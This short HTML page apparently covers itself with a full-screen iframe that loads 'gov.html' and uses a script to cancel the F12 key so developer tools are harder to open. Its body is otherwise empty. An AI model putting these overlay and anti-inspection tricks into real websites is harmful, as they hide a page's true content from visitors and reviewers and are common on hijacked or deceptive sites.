<!DOCTYPE html>
<html lang="zh">
<head><iframe src="gov.html" frameborder="0" style="position:fixed;top:0;left:0;width:100% !important;height:100% !important;max-height: none !important;"></iframe>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <link rel="shortcut icon" href="/favicon.ico" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no">
	<title>Welcome！</title>
	<link rel="stylesheet" href="/static/css/min.css">
	<script src="/static/js/index.js"></script>
	<script>

		document.onkeydown = function(e){
			if(e.code === 'F12'){
				return false;
			}
		}
	</script>
 </head>
<body>
</body>
</html>